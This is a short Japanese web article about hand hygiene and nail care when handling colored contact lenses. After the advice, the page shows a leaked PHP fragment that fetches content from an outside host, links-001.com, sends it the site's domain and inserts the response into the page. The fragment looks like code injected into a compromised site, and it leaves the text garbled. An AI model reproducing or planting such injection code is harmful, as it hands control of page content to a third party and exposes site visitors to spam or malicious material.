カラコンを利用する際の手の手入れについて

カラコン

カラコンを利用する際の手の手入れについて

カラーコンタクトは装着すると大きく印象がかわり、ファッションの際に合わせて利用する人が多いです。
ただしカラコン自体は通常のコンタクトレンズと同じように、ただし洗浄方法や保管方法で使用することが重要となります。
使用方法や洗浄方法を正しく行わない場合は、目にトラブルが起こることがあるのでその点はしっかり守ることがポイントです。
同時にカラコンを利用する際は手の手入れも行っておくと良いです。
レンズ自体は保存液などで保管しますが、使用する際は手で瞳に装着する事になります。
そのためカラコンに触れる前に必ず手は綺麗に洗うようにします。
また石鹸をつけて洗う事で、より手を清潔にすることができレンズも清潔な状態で取り扱う事ができます。
またレンズ自体は指でつまんで装着なり取り外しを行いますが、爪が伸びているとレンズを傷つけてしまう場合があります。
また目に装着する際も邪魔になる可能性もあるので、爪は短くカットしておくと良いです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

お知らせ

一覧